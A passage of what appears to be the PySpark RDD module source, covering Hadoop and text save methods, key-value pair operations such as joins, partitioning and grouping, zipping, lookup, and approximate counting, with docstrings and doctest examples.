self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
        Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
    # portable_hash is used as the default, because the builtin hash of None
    # differs across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
        a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
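        A small illustrative example, summing the values for each key (uses the
        doctest SparkContext C{sc}):
        >>> from operator import add
        >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(rdd.aggregateByKey(0, add, add).collect())
        [('a', 2), ('b', 1)]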
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
        (e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
    # TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
            # Decrease the batch size in order to distribute the elements evenly across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
        first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
        more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
        L{zipWithIndex}.
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
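        For example (not executed as a doctest, since the exact lineage text
        varies with the Spark version and the RDD):
            print(sc.parallelize([1, 2]).map(str).toDebugString())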
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
        It will convert each Python object into a Java object with Pyrolite, whether the
        RDD is serialized in batches or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
